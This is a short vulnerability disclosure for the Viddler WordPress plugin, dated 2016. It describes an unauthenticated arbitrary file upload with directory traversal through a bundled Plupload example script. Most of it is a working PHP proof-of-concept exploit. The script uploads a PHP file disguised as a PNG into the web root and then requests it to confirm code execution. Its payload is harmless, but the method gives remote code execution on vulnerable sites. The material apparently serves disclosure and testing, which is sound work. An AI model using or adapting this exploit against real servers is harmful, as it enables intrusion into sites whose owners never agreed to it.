Viddler WordPress plugin [Unauthenticated Arbitrary File Upload]
Plugin includes an example script from the Plupload library that allows unauthenticated users to upload arbitrary files on server.
For this script to work the PHP directive upload_tmp_dir
must be set
and pointing to a directory writable by the user that runs the script.
Files are uploaded through the $_FILES['file']
param can be used to perform a directory traversal
in order to upload the file in the desired directory.
#!/usr/bin/env php
* Viddler Wordpress plugin - Unauthenticated Arbitrary File Upload
* **IMPORTANT** This exploit make the following assumptions:
* - The PHP directive `upload_tmp_dir` isset and points to `/tmp` dir
* - WordPress is installed in `/var/www` dir
* Author: Pan Vag <[email protected]>
* To install deps run `composer install`
require_once 'vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\Request;
$url = Config::get( 'url.base', null, true, 'Enter the site URL' );
if ( ! $url ) {
ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$identifier = uniqid();
$fileName = $identifier . '.php';
Cli::writeInfo('Sending payload...');
$r = Request::upload(
Endpoint::pluginsURL() . '/the-viddler-wordpress-plugin/js/plupload/examples/upload.php',
[ 'name' => "../../var/www/{$fileName}" ],
[ 'file' => [ 'fileContents' => "<?php echo '{$identifier}';unlink(__FILE__);", 'fileName' => 'image.png', 'contentType' => 'image/png' ] ]
if ( ! $r->success || strpos( '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}', $r->body ) === false ) {
ExitCodes::exitWithFailed( 'Upload failed' );
Cli::writeInfo('Validating exploit...');
$r = Request::get(Endpoint::baseURL().'/'.$fileName);
if(!$r->success || $r->body != $identifier){
ExitCodes::exitWithFailed('Failed to validate upload...');
ExitCodes::exitWithSuccess('Exploitation successful!');
This plugin is no longer available in the website. The last commit in the repo was 3 years ago so most likely it’s abandoned.
- 19 September 2016
- Pan Vag
- Viddler WordPress plugin
- 2.0.0
- WordPress 4.6
- DWF-2016-87136